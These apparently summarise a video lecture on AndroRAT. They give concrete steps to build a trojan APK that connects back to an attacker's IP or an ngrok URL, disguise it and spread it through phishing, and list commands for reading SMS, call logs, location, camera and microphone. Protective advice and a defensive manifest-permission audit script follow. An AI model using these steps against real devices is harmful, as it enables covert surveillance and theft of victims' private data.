Understanding AndroRAT and Mobile Threats

Apr 4, 2025

Lecture on Cybersecurity Threats: AndroRAT and Mobile Security

Introduction

  • Theme: Understanding Android security threats
  • Focus: AndroRAT - a tool for remote access to Android devices
  • Objective: Build awareness in order to protect against attacks
  • Disclaimer: Educational purposes only; illegal to use maliciously

Overview of AndroRAT

  • Functionality: Gives full control over Android devices
  • Access:
    • Cameras
    • Microphones
    • Messages
    • Location data
  • Invisibility: No warnings or noticeable signs for users
  • Control: Allows remote control by attackers

Setup and Installation

  1. Kali Linux Preparation

    • Update using sudo apt update
    • Upgrade packages with sudo apt upgrade
  2. AndroRAT Installation

    • Not in default repositories; download from GitHub
    • Clone repository using git clone
    • Navigate to the AndroRAT directory
    • Create a virtual environment and activate it
    • Install dependencies from requirements.txt
  3. Creating Malicious APK

    • Use command: python3 androrat.py --build -i [IP] -p 8000 -o rat.apk
    • Exploits trust by mimicking legitimate app icons
  4. Distribution of Malicious APK

    • Use social engineering for installation
    • Methods include phishing, fake websites, third-party stores

Demonstration of AndroRAT's Capabilities

  • Remote Access: Connection from target to attacker’s machine
  • Command Features:
    • camList: Access device cameras
    • start_audio / stopAudio: Record microphone audio
    • getSMS inbox/sent: Retrieve SMS messages
    • getCallLogs: Access call history
    • getLocation: Retrieve GPS coordinates
    • getClipData: Access clipboard contents
    • vibrate: Control device vibration

Internet-based Attacks

  • Using Ngrok:
    • Establishes connection over the internet
    • Command: python3 androrat.py --build --ngrok -o devil.apk
    • Creates a public URL via Ngrok

Protective Measures

  • App Downloads: Use only official sources like Google Play Store
  • Permissions: Review app permissions critically
  • Updates: Regularly update device software
  • Security Software: Install mobile security solutions
  • Be Wary:
    • Avoid dubious links
    • Monitor for unusual device behavior
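
The permission review recommended above can be partly automated. The following is an added example, not code from the lecture or from the AndroRAT project: it reads a decoded AndroidManifest.xml (for instance one produced by apktool) and flags an app that combines network access with several of the sensitive capabilities listed in this lecture. The sample manifest, the package name com.example.flashlight and the threshold of 3 are assumptions made for the example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Capabilities named in the lecture, mapped to the permissions that gate them.
# Clipboard access has no manifest permission, so it cannot be checked this way.
CAPABILITY_PERMISSIONS = {
    "camera": {"android.permission.CAMERA"},
    "microphone": {"android.permission.RECORD_AUDIO"},
    "sms": {"android.permission.READ_SMS"},
    "call_logs": {"android.permission.READ_CALL_LOG"},
    "location": {"android.permission.ACCESS_FINE_LOCATION",
                 "android.permission.ACCESS_COARSE_LOCATION"},
}

# Constructed sample: decoded manifest of a hypothetical flashlight app.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.flashlight">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <application android:label="Flashlight"/>
</manifest>
"""

def requested_permissions(manifest_xml):
    """Return the set of permission names declared in a decoded manifest."""
    root = ET.fromstring(manifest_xml.strip())
    tags = ("uses-permission", "uses-permission-sdk-23")
    names = (el.get(ANDROID_NS + "name") for el in root.iter() if el.tag in tags)
    return {n for n in names if n}

def audit(manifest_xml, threshold=3):
    """Flag apps that pair network access with several sensitive capabilities.
    threshold is an assumed cut-off for this example, not an established rule."""
    perms = requested_permissions(manifest_xml)
    caps = sorted(c for c, gate in CAPABILITY_PERMISSIONS.items() if perms & gate)
    networked = "android.permission.INTERNET" in perms
    return {"capabilities": caps, "networked": networked,
            "review": networked and len(caps) >= threshold}

if __name__ == "__main__":
    print(audit(SAMPLE_MANIFEST))
```

A flagged result is a prompt for manual review, not a verdict: legitimate messaging or navigation apps can request the same permissions, so the question is whether the set matches what the app claims to do.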

Conclusion

  • Educational Purpose: Understanding the threat in order to improve security
  • Ethical Use: Knowledge to protect, not exploit
  • Community Engagement: Encourage sharing information

Call to Action

  • Engagement: Like, subscribe, and share for awareness
  • Feedback: Invite comments and topic suggestions

Final Reminder

  • Knowledge empowers protection but requires ethical responsibility
  • Stay informed and vigilant against cybersecurity threats

Presenter: Tech Sky

  • Encourages continued learning and ethical practice in cybersecurity.